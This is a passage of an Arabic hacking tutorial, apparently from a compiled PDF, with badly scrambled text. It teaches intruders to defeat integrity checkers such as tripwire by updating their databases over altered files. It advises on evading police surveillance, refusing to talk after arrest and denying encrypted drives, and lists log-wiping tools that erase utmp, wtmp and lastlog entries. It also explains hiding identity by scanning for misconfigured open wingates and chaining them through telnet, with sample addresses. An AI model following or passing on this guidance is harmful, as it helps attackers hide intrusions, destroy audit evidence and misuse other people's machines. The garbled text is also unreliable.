‪.tiger.‬‬ ‫من الدوات الت تستعمل في مثل هذه الفحوصات الداخليه‬ ‫‪.bash_profile‬لمراجعه أعدادات الـ ‪ alias‬التي تستخدم‪ .sh_history/. root.‬‬‫‪wheel. cops.c‬لنتحال شخصيه المستخدم( ‪ . spi.

‫‪SOFTWARE : STANDARD PATH : BINARY FILENAMES‬‬ ‫‪tripwire : /usr/adm/tcheck.. tripwire‬‬ ‫‪binaudit : /usr/local/adm/audit : auditscan‬‬ ‫‪hobgoblin : ~user/bin : hobgoblin‬‬ ‫‪raudit : ~user/bin : raudit.2‬يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فل يتم فحصها مرة‬ ‫اخري للتحقق ) ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها ل يتم فحصها ب ‪checksum‬‬ ‫حتي ل يتم اكتشاف التغييرات التي قمت بها (‬ ‫ حيل المستخدم المنيه‬‫*******************‬ ‫هذه الحيل ما ندر توجد او تستخدم لكنني كتبتها فقط لكون شملت كل شئ ) لكمال الموضوع ( ‪ .login.‬‬ ‫ليعني القانون اي شئ لل ‪ ) admins‬بعض الوقات اعتقد انه ل يوجد فرق بين ال ‪ hacker‬و ال‬ ‫‪ administrator‬ال بان مالك الكومبيوتر هو ال ‪ administrator‬فقط ( عندما يعتقدون انك هاكر فانك‬ ‫فورا اصبحت مذنب ‪ ..‬‬ ‫لذا فعليك عدم القيام باي اتصالت فيها اخبار اخترقاتك ‪ ..‬و ان حتى اردت ان تحذر اصحابك فل تخبرهم‬ ‫هاتفيا او ببريد الكتروني ) ال اذا كان مشفرا( و من الفضل ان تخبرهم عندما تقابلهم وجها لوجه ‪ ..‬سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف الدمين‬ ‫سيرصدك ايضا هجماتك الخرى ‪...‬و‬ ‫تمنعهم من راسال اي رسائل غيير عاديه ‪..pl‬‬ ‫‪l5 : compile directory : l5‬‬ ‫كما تري هناك احتمالت كثيرة‪ ،‬ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر‪ ،‬مثل جزء‬ ‫‪ NTFS‬لمضيف او جهاز آخر ‪ ،‬او حتي قواعد بيانات التي تحمل معلومات ‪ checksum‬في جهاز محمي‬ ‫علي الكتابة ) اقراص ‪ CD‬مثل ( ‪..cshrc. ..."tripwire -update /bin/target‬‬ ‫‪ .‬‬ ‫ولكن يمكنك القيام بعملية فحص استطلعي سريع لمعرفة البرامج المستخدمة ‪ ،‬واذا لم تستخدم ففرصتك‪،‬‬ ‫واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك النواع من البرامج هذا يعني ان الموقع او المزود‬ ‫محمي بشكل جيدا ) هارد لك ( ويجب ان ل تعبث بالملفات ابدا ‪. . .‬و ال ستواجه مشاكل اعتقد انك‬ ‫‪85‬‬ ..‬‬ ‫لتؤمن نفسك عليك ان تبقى على هذا الحال على القل من شهر الى شهرين ‪ .logout .. /usr/local/adm/tcheck : databases.‬‬ ‫الخ ) اي الملفات التي تبدا بنقطه (‬ ‫الجزء الخامس ‪:‬‬ ‫=========‬ ‫ماذا تفعل ان وضعت تحت المراقبه؟‬ ‫***************************‬ ‫متى اصحبت تحت الميكروسكوب ) المراقبه ( من قبل الشرطه او حتى ال ‪ administrators‬عليك القيام‬ ‫بخطوات هامه و سريعه حتى ليستطيعو المساك بدليل ) برهان ( عليك‬ ‫ ملحوظه ‪ :‬ان كان في اعتقاد ال ‪ administrators‬انك ‪ hacker‬فانت ==< مذنب حتى تثبت‬‫براته ‪.‬فبعض‬ ‫المستخدمين يسمون اشتراكاتهم ‪ admins‬و بالطبع ل يريدون ان يعبث في ملفاتهم اي شخص فيقومون‬ ‫بعمل بعض الحيل في ملفات ال ‪ startup‬لذا فدائما تحقق من ‪profile..‬‬ ‫ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟‬ ‫يمكنك ‪ .1‬ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات‬ ‫مثل "‪.‬‬ ‫اذا كان يمكنهم مراقبة كل هذه التصالت اكيد ببساطه يمكنهم مراقبة خط تيليفونك ‪.

. wtmp.‬لن هذا لن يفيدك بل سيدينك اكثر ‪ .‬فاطلب محاميك كي‬ ‫يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان ل تذكره نهائيا ‪ . so‬‬ ‫‪! it's better than zap.real Editor for the logfile‬‬ ‫‪.. Watch out.best‬‬ ‫‪wzap.tar Changes the entries of accounting information‬‬ ‫‪clear.‬انما ايضا بدخول اصحابك في الموضوع ستتسع‬ ‫دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا !‬ ‫بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك‬ ‫بمنتهى الحريه عدم الفصاح عنها‬ ‫لكن بعض الدول الخرى في قانونها انه مادامت وقعت في المصيده لبد ان تدلي لهم بكل شئ في هذه الحاله‬ ‫انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره‬ ‫الجزء السابع ‪:‬‬ ‫========‬ ‫قائمه بافضل البرامج للتخفي و الختباء ‪:‬‬ ‫******************************‬ ‫‪Change .Don't use! Can be detected‬‬ ‫‪-------------------------------------------------------------------------------------‬‬‫الجزء الثامن ‪:‬‬ ‫=========‬ ‫كلمه ختاميه‬ ‫**********‬ ‫‪86‬‬ . zap) .‬بعدها غالبا ما سيطلب‬ ‫المحامي جهازك ) الكومبيوتر ( باقصى سرعه بحجة احتياجه في العمل و ال عليهم تحميل جميع العباء‬ ‫الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز ‪ .just Overwrites the entries with zero-value bytes‬‬ ‫‪!Don't use such software (f.c Changes the entries in utmp..Changes fields of the logfile to anything you want‬‬ ‫‪Delete . wtmp.c‬‬ ‫‪!marryv11.Overwrite . wtmp. there are numerous inv*. wtmp and lastlog‬‬ ‫‪invisible.c Deletes entries in wtmp‬‬ ‫‪wtmped.‬و ان كان يجب استجوابك فاطلب‬ ‫ان يتم هذا فقط من خلل محاميك ) و هذا ايضا حق من حقوقك (‬ ‫لتخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه ‪ .c Edit utmp.c Deletes entries in utmp. lastlog .. wtmp and lastlog with predefines values.c Deletes entries in wtmp‬‬ ‫‪!zap.‫لترغب بها‬ ‫الجزء السادس ‪:‬‬ ‫=========‬ ‫ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك‪:‬‬ ‫**************************************************‬ ‫**************‬ ‫اول ‪ :‬اطلب محاميك فورا !!!! ‪ :‬ل تحاول بان تتذكى انت و ترد على التحقيق بمفردك ‪ ..c Overwrites utmp.it can be detected‬‬ ‫‪--------------------------------------------------------------‬‬‫‪LOG MODIFIER‬‬ ‫‪++++++++++‬‬ ‫‪ah-1_0b.‬لذا فانه من العملي جدا ان يكون عندك محامي‬ ‫جاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير‬ ‫ثانيا ‪ :‬ابدا ل تتكلم ال الشرطه !!! ‪ :‬لتعطي للشرطه اي معلومات عنك او عن زملئك بحجة ان هذا سيخفف‬ ‫العقاب عنك و سيخرجك من المازق ‪ . lastlog and accounting data . lastlog and wtmpx‬‬ ‫‪cloak2.Deletes. cuts out the entries you want‬‬ ‫‪Edit ..e.c Overwrites utmp.

Wingate‬‬ ‫)وكيفية استخدامهم للزيادة من صعوبة الكشف عن هويتك في النت(‪-‬‬‫مع أدوات بسيطة أيضا تساعدك في التخفي‬ ‫‪87‬‬ .‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟ "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫في هذا الموضوع سوف أقوم بتعليمكم‬ ‫ماهو؟‬ ‫‪Proxy ..Sock Host .‬اعرف في من تثق و من ل !!‬ ‫لتفكر في نفسك فقط )انما ايضا تذكر كل من حولك (‬ ‫تمنياتي للجميع بحياة ممتعه و امنه ‪..‬دائما اجعل عيناك مفتوحان ‪ .‫لتدعهم ابدا يقبضون عليك ‪ ..

‬‬ ‫وأيضا ياأخواني الوقت مهم مثل اذا الواحد استعرض صفحة ببروكسي من قبل ‪ 10‬أيام وانت استخدمت نفس‬ ‫البروكسي واسعرضت نفس الصفحة غير اذا عرضها في يومين لن ‪ proxy server‬يقدم المواقع الحديثة‬ ‫على القديمة علشان كذا أحيانا تلحظ تأخر في البروكسيات كل ماعليك عمل ‪ Refresh‬أو ‪Reload‬‬ ‫‪Why use a Proxy Server‬‬ ‫=)لماذا نستمعل البروكسي سيرفر؟(=‬ ‫وانا راح اجاوب على الخوان الي يسئلوني مادام خادم البروكسي يقوم بعملية إبطاء التحميل والتقليل من‬ ‫السرعة إذا مالدافع لستخدامه ؟!!!‬ ‫الجواب‪:‬هو أن مزودين خدمة النترنت‬ ‫‪ISP‬‬ ‫‪Internet Service Provider‬‬ ‫يقومون بالتحديد وبوضعك في قفص وهو عدم السماح لستعراض وتحميل الصفحات إل التي تم الموافقة‬ ‫عليها من قبل مزود الخدمة ويقومون بتقليل المواقع للحفاظ على ‪ Traffic‬الخاص بهم لتوفير السرعة في‬ ‫استخدام البروكسي لمشتركينهم‬ ‫أما ‪ proxy server‬سوف يجعل لك الحرية الكاملة في استعراض أي موقع مهما كان وسبب آخر‬ ‫للبروكسي وهو للحفاظ أو للزيادة من بقائك مجهول أثناء قيامك بأي عملية من عمليات التصال يعني لو‬ ‫استخدمت بروكسي راح يصعب على خادم الموقع اصطيادك وذلك لنه يأخذ ‪ ip‬الذي اتصل الموقع من خلله‬ ‫وهو ‪ ip‬البروكسي وهو الذي يتصل مع خادم الموقع‬ ‫وأيضا تستطيع الزيادة من صعوبة محاولة السقاط بك وذلك باستخدام عدة بروكسيات ذات منافذ مختلفة لكن‬ ‫أعلم أن هذا سوف يقوم بتقليل من سرعة التصال لذلك حاول ان تستخدم‬ ‫‪ proxy‬و ‪ port‬قريبين إلى منطقتك التي تعيش فيها حتى يكون ‪ proxy server‬قريب وبذلك سوف‬ ‫‪88‬‬ .tk‬‬ ‫عليك أول بالطلب من هذا ‪ proxy server‬ثم يقوم ‪ proxy server‬بطلب الصفحة‬ ‫‪/http://hackergurus..‫‪++++++++++++++++++++++++++++++++++‬‬ ‫‪Introduction to Proxy Server‬‬ ‫=)الدخول إلى ‪ proxy server‬أي‪:‬خادم الوكيل(=‬ ‫‪) proxy server‬خادم الوكيل( هو خادم ‪ server‬ليقوم أحدا ما بتنزيله على نظامه للتصال مع المواقع‬ ‫أو أي جهاز على النترنت مايفعله أول هو التصال بخادم الوكيل ‪proxy server‬‬ ‫لكنه غير إجباري لكن غالبا مايستخدم في الشبكات‬ ‫مثل‪LAN:‬‬ ‫‪Local Area Network‬‬ ‫شبكة إنترنت محلية عند اتصالك بالنترنت خلل ‪ proxy server‬جميع اتصالتك سوف تذهب إلى هذا‬ ‫البروكسي المستخدم أول وقبل كل شيء ثم تتوزع على الجهزة التي تريد أن تعمل إتصال بها كمثال‬ ‫إذا أردت أن تتصل بالنترنت من خلل استخدام ‪ proxy server‬وتريد أن تتصفح وتفتح موقعا كهذا‬ ‫‪/http://hackergurus.tk‬‬ ‫إلى الخادم ‪ server‬الموقع ومن ثم تحميلها وتخزينها في حسابها بعد ذلك سوف تمدك وتعطيك الصفحة‬ ‫أي‪:‬تستعرضها‪...‬‬ ‫أليست هذه العملية تأخذ ‪ bit‬بسيط في وقت أطول مقارنة بالتصال المباشر )العادي( الذي يكلفك فقط بطلب‬ ‫الصفحة من خادم الموقع ومن ثم جاري تحميلها بسهولة واستعراضها‬ ‫لكن مع استعمالك للبروكسي سيرفر سوف يصبح اتصالك بالنترنت بطيء مقارنة مع التصال المباشر وذلك‬ ‫لن كل صفحة تقوم بتحميلها أي تستعرضها تذهب إلى خادم البروكسي أي ‪ proxey server‬وهذا يثقل‬ ‫عملية التصفح‬ ‫وهناك حالة وحدة وقد تصبح ‪ lucky‬بعض الحيان قل كيف‬ ‫إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات وانت استخدمت البروكسي الي‬ ‫استخدمه هذا الشخص واستعرضت الصفحة الي استعرضها راح يصبح البروكسي سريع ليه؟!‬ ‫لن الشخص الول الي قام باستخدام البروكسي وعرض الصفحات الصفحة حملت إلى ‪ proxy server‬فما‬ ‫بالك إذا كان لديك نفس البروكسي وحبيت تسعرض نفس الصفحة سوف يكون سريع لن الصفحة‬ ‫‪ download‬جاهزة فهمت ‪#.

ISDN. 23‬في الحقيقة‬ ‫هو اتصال ‪.‬بإمكانك تاخذ عنوان ‪ wingate‬من أصدقائك إذا‬ ‫كان أحد عنده ‪ .‬الشيء الثاني أقترح عليك تستخدم برامج‬ ‫‪WinGate Scanner‬‬ ‫هنالك العديد منها بالنت ابحث فقط في ‪google‬‬ ‫‪/http://www. satellite connection. Telnet‬‬ ‫‪ the wingate‬سوف يجعل أي شخص على الشبكة دخول النترنت أو التصال به لمواقع أخرى ‪ .google.com‬‬ ‫‪89‬‬ .‬‬ ‫مثل ‪ wingate‬قد يطلق عليه ‪ open wingates‬وعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقوم‬ ‫باكتشافه ‪) Admin‬المدير( وهذا راح يكون ‪ DIScover‬ياأخواني يعني مكشوف أو يتلقى شكاوي من‬ ‫سوء استخدام أو أعضاء غامضين !!!‬ ‫الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس التصال لكن ياأخوان المشاكل‬ ‫تفوق الفوائد‬ ‫إذا أي شخص قام بتنزيل ‪ WinGate‬خاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفق‬ ‫بشكل آمن وهنالك أخرى متعددة أكثر ‪ WinGate‬أمانا مثل برامج ‪SyGate‬‬ ‫في معظم الحالت ملفات ‪) Logs‬سجلت( الخاصة بالـ ‪ WinGate Server‬تحذف عادة بعد ‪ 48‬ساعة‬ ‫للعمال وأيضا للـ ‪) ISP's‬خاصة بالكبار(‬ ‫أي ليوجد حاجة أو موارد لتدوين كل شيء يصادف خادم ‪wingate‬‬ ‫‪How do I find Wingates‬‬ ‫=)كيف يمكنني الحصول على ‪WinGate‬؟(=‬ ‫أفضل طريقة للحصول على هذا الشيء هو كلمة بالفم ‪ .‬‬ ‫تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعلن كأن يقول‬ ‫استخدم‬ ‫‪ cach.‬بصورة‬ ‫سيئة وفق بين ‪ wingate‬وعدم كفاءة ‪) Aminstrator‬المدير(‬ ‫وهنالك العديد من ‪ wingate‬والذي تجعل الشخاص على النترنت للتصال ببعضهم ‪ .‫تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! ‪(. or even‬‬ ‫‪dedicated T1 circuits‬‬ ‫‪------------------------------------------------------------------------------------------‬‬‫‪wingate‬‬ ‫متشابه مع البروكسي سيرفر حيث يعمل اتصالت مع كومبيوتر لسيرفر آخر خلل المنفذ ‪ . xDSL..Mirc‬إلى سوء استغلل الحجم ‪. cable modem.com‬بمنفذ ‪80‬‬ ‫وطبعا انت ماتصدق تلقي بروكسي بهذي المميزات‬ ‫‪ -1‬سريع التصفح‬ ‫‪ -2‬يفتح جميع المواقع‬ ‫‪ -3‬التحميل عالي جدا وقوي‬ ‫هل تعرف لماذا ؟‬ ‫لن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا‬ ‫لن هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات ‪Logs‬‬ ‫‪Introduction to Wingate‬‬ ‫=)الدخول أو الدخال إلى ‪=(Wingate‬‬ ‫كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟‬ ‫ماهو ‪ WinGate‬؟‬ ‫هو ‪ proxy server firewall‬أي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي على‬ ‫حزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك ‪) Anonymously‬مجهول الهوية(‬ ‫التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت بشركة كمبيوتر بالكامل‬ ‫اتصال النترنت يكون مشارك بواسطة ‪ WinGate‬تقريبا لعدة أنواع تشمل‪:‬‬ ‫‪------------------------------------------------------------------------------------------‬‬‫‪dial up modem.‬بدل من تحديد‬ ‫المدخل للناس من ‪) Local Network‬الشبكة المحلية(‬ ‫وفتح الطريق لي شيئ من ‪ ipspoof‬في ‪ ICQ .microsoft.

‫كل ماعليك فعله هو وضع مدى ‪ ip‬او ‪ hostname‬ومن ثم البدء بالبحث‬ ‫مثل اقترح عليك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقيا وأخيرا شبكة ‪ @home‬كلهم‬ ‫يتشابهون ولديهم صفات شائعة وهي‪:‬‬ ‫توفر ‪ wingates‬والذي وفق بصورة رديئة وعادة هناك ‪ wingate‬مفتوح قليل على ‪NetWork‬‬ ‫حقهم ‪.‬‬ ‫خلل ‪ Unix‬أفضل طريقة هي‪ :‬المحاولة والخطأ‬ ‫‪Trial and Error‬‬ ‫اتصل بالتلنت في ‪ wingate‬من المنفذ ‪23‬‬ ‫واذا لقيت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سرك‬ ‫او تستخدم ميزة ‪) Guest‬الضيف( أو ‪Anonymously‬‬ ‫‪Introduction to Socks Host‬‬ ‫=)الدخول أو الدخال إلى ‪=(Socks Host‬‬ ‫‪ Socks Host‬تقريبا مثل ‪ WinGate‬لكن الختلف وهو ان السوكس يتصل من خلل المنفذ ‪1080‬‬ ‫وبإمكانك عمل العدادات عليها وهي تتوفر في المتصفح‬ ‫‪explorer and netscape‬‬ ‫وبإمكانك إضافة ‪Socks Host‬‬ ‫وهذه الطريقة تستخدم كثيرا في ‪ Mirc‬وتقوم بحمايتك وبإخفاء ‪ ip‬الخاص بك وتعمل كـ ‪FireWall‬‬ ‫**********************‬ ‫وهذه برامج مساعدة على بقائك مجهول الهوية‬ ‫**********************‬ ‫‪Ghost Surf‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫‪Stealther‬‬ ‫‪------------------------------------------‬‬‫ابحثوا عن البرنامجين السابقين في النترنت‬ ‫‪-------------------------------------------‬‬‫لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهول ‪%100‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تبقى مجهول الهوية في النت)الجزء الثاني(؟؟ "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق‪..‬‬ ‫هذه الفقرات عن ‪ Chaining Proxies‬لبقاء حريتك وسريتك على النترنت وقت أطول أثناء اتصالك لكن‬ ‫لتظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول‬ ‫‪90‬‬ ....

‬‬ ‫هذي توضح كيف تتصل عن طريق البروكسي بالموقع‬ ‫]‪[User]>>>>>[Proxy]>>>>>[Web Pages‬‬ ‫‪---------------‬‬‫‪Proxy Chaining‬‬ ‫‪91‬‬ .‬‬ ‫قبل أن تقرأ هذا الموضوع علي اول ان اقوم بإرشادك كيف تحصل على ‪ Proxy‬مع تحديثها من هذه‬ ‫المواقع‪:‬‬ ‫‪http://www.com‬‬ ‫وأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل ‪Replay‬‬ ‫الن مبروك لقد سجلت بالجروب‬ ‫‪)------------------------------------------‬‬‫=========================‬ ‫أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن‬ ‫البروكسي يعمل بالذهاب إلى ‪:‬‬ ‫‪/http://www.htm‬‬ ‫‪/http://tools..IRC Chat.privacy.com/proxy‬‬ ‫أو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ ‪ Group‬وهو يقوم بإرسال بروكسيات جديدة جدا‬ ‫وبمنافذ مختلفة‬ ‫الجروب‪P_R_O_X_Y@yahoogroups...multiproxy.‫وأيضا سوف نتكلم عن ‪ Chaining wingates‬لتصبح مجهول على ‪Telnet‬‬ ‫‪)------------------------------------------‬‬‫من المعروف أن أغلبكم يستخدم ‪ proxy‬لخفاء ‪ ip‬الخاص به او ‪ Domain‬او قد يستخدم البروكسي لكي‬ ‫يجتاز المواقع المغلقة وأيضا لحماية هويته ‪.net‬‬ ‫أو‬ ‫‪/http://www..com‬‬ ‫وقد تعرف هل عنوان ‪ Ip‬تغير أم ل !!! هذا بالنسبة للموقع الول أما الموقع الثاني فهو خاص لكشف‬ ‫البروكسيات واعطائك مستوياتها ‪.proxytester.rosinstrument.‬‬ ‫=========================‬ ‫*************************************‬ ‫&&&&&&&&&&&&&&‬ ‫‪proxy server‬‬ ‫&&&&&&&&&&&&&&‬ ‫هو خادم ‪ Proxy‬يقوم بالتصال بين ‪(WebSite.etc):‬‬ ‫هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على النترنت البروكسي‬ ‫يرسل طلبك على النترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن‬ ‫في ‪Proxy Server‬‬ ‫كما قلنا في الموضوع السابق‪.org/anon_list.com:‬‬ ‫طريقة التسجيل‬ ‫قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة‬ ‫في خانة الرسال إلى اكتب‬ ‫‪P_R_O_X_Y-subscriber@yahoogroups.‬‬ ‫لكن عليك ان تتعلم كيف تستخدم ‪ Proxy‬ومن الفضل ان تعرف ماذا هو ‪ Ip Address‬و ‪Domain‬‬ ‫أول ‪..

com‬‬ ‫‪ = proxy‬استبدله ببروكسي رقمي يكون أفضل لك ‪.free.yahoo.destination.23:‬‬ ‫‪92‬‬ . etc‬‬ ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أي‬ ‫‪ server‬مثل ‪telnet.‫‪---------------‬‬‫معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من‬ ‫بروكسي لكي تعرض موقع واحد‬ ‫مثال‪/‬‬ ‫]‪[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination‬‬ ‫يوضح هذا المثال ان المستخدم اول عليه التصال بالبروكسي الول فالثاني فالثالث والرابع وأخيرا الهدف‬ ‫مما يسبب بطأ في التصال‬ ‫‪Destination = web page.234.google.com/http://www.com‬‬ ‫او يمكننا وضع عناوين بروكسيات بمنافذها‬ ‫‪http://anon.anonymizer.124.magusnet.com/-_-http://www.server1. Unix server.. ftp.23:80‬‬ ‫العنوان‪213. or http‬‬ ‫‪ Chaining‬هي مهمة كما أقول لن تصبح مجهول ‪ %100‬لكن حاول بقدر المستطاع على ان ل تمسك‬ ‫ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثل حاولت تدخل على موقع بالـ‬ ‫‪ ftp‬راح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من‬ ‫‪ Adminstrator‬ملفات ‪ Logs‬لكي يعرف المصدر والمصدر ايضا راح يكون ‪ proxy‬ههههههههه‬ ‫يعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية ‪ Chaining Proxy‬عملية مفيدة جدا‬ ‫ويصعب احدهم المساك بك‬ ‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسموح به من تحميل‬ ‫الملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات ‪ Logs‬متجددة ‪..com/-‬‬‫‪http://www..com‬‬ ‫حركة جميلة وجديدة )‪ (-_-‬لم ترونها مسبقا صحيح !!!‬ ‫وأيضا يمكننا استخدام ‪ Chaining‬مثل‪:‬‬ ‫_‪http://proxy.server2.com/-_-http://proxy...‬‬ ‫‪---------------‬‬‫‪HTTP Chaining‬‬ ‫‪---------------‬‬‫‪ HTTP chaining‬هي نفس طريقة ‪ Proxy‬ويمكنك عملها من مستعرضك وفي خانة ‪Address‬‬ ‫مثال‪:‬‬ ‫‪http://proxy. ftp server..google.234.‬‬ ‫‪---------------‬‬‫‪Browser Chaining‬‬ ‫‪---------------‬‬‫وهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن ‪ Internet Explorer‬لنه الكثر‬ ‫استخداما ‪----‬‬ ‫ألحين مثل عندنا بروكسي‬ ‫‪213.124.com‬‬ ‫مثال آخر‬ ‫كإضافة علمة )‪ (/‬بين المواقع‬ ‫‪http://proxy1/http://proxy2:80/proxy3:80/http://www.

124.124.23:80 143.23:‬المنفذ‪ 80:‬وبعد كذا اضغط موافق و‬ ‫والحين نبغى نستخدم الستعراض المتعدد ‪Chaining Proixes‬‬ ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا‪/‬‬ ‫‪Address: 213.54.148.172.234.23:80 121.‫المنفذ‪80:‬‬ ‫ألحين كيف نحطها بدال البروكسي الخاص بالـ ‪ ISP‬أي مزد خدمة النترنت‬ ‫نروح عند‬ ‫أدوات ‪Tools‬‬ ‫خيارات إنترنت ‪Internet Options‬‬ ‫بعدين اتصالت ‪Connections‬‬ ‫تختار التصال الي تدخل في النترنت بعدين‬ ‫إعدادات ‪Settings‬‬ ‫راح تجد‬ ‫‪) Address‬العنوان(‬ ‫‪) Port‬المنفذ(‬ ‫ونضعه بداله‬ ‫العنوان‪ 213.234.67 Port: 80‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪Wingates‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪ Wingate‬هو ‪ proxy server‬الذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون‬ ‫مقاعدهم بالمنفذ خلل ‪)) 23‬منفذ ‪ Telnet‬العادي ((‬ ‫بعض ‪ Wingates‬يسمحون لي شخص متصل ‪ online‬لكي يتصلون به مباشرة او في وقت قصير‬ ‫لتتعدى اليام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـ ‪ Admin‬تمنع من استخدام‬ ‫‪ wingate‬على جهازه هذا على حسب المدير هل يفهم في هذا المجال أم ل !!!!‬ ‫وهي عبارة عن ‪ ip‬أجهزة أو اسماء أجهزة تتصل من خللها على المنفذ ‪ 23‬بأداة ‪ Telnet‬أو يمكنك من‬ ‫عمل بحث ببرامج‬ ‫‪WinScan‬‬ ‫‪Wingate‬‬ ‫‪93‬‬ .134.

133..130 23‬‬ ‫لحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك‬ ‫بعد كذا سوف تتصل بالوين جيت مثل هذا‬ ‫‪Wingate> 203.7 23‬‬ ‫‪94‬‬ .45 23‬‬ ‫وأيضا اتصل مرة أخرى‬ ‫‪Wingate> 10.130‬ومنفذه ‪23‬‬ ‫ويتم التصال به عن طريق ‪ Telnet‬مثل‪:‬‬ ‫‪C:\WINDOWS>telnet 61.17.‫‪Download‬‬ ‫‪------------------------------‬‬‫‪Chaining Wingates Using Telnet‬‬ ‫‪------------------------------‬‬‫ألحين راح نستخدم عدة ‪ Wingate‬كالسابق والدوات التي نحتاجها‬ ‫هي فقط ‪ DoS‬وأداة ‪ Telnet‬لظن أن الجهزة سوف تخلو من أهم هذين الداتين إل نادرا ‪.173.212.‬‬ ‫جميع ‪ wingate‬تتصل عن طريق المنفذ ‪ 23‬لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا‬ ‫فقط كيف يتم التصال بالـ ‪ Telnet‬عن طريق المنافذ‬ ‫وهذا عنوان جهاز امكننا إحضاره‬ ‫هو ‪ 61..207.166 23‬‬ ‫بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا‬ ‫‪Wingate> 213..119.99.119.133..65.

119.133..Connected ،،،‫انتهى‬ 95 .‫ اتصل بالموقع‬wingate ‫ألحين بعد ماتتصل بأكثر من‬ WinGate>arbornet.166 23 Wingate>135.org ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‬ C:\Windows> telnet 61.167 23 Wingate>m-net.18.arbornet.173.245.130 23 Wingate>203.org..org Connecting to host arbornet.207.

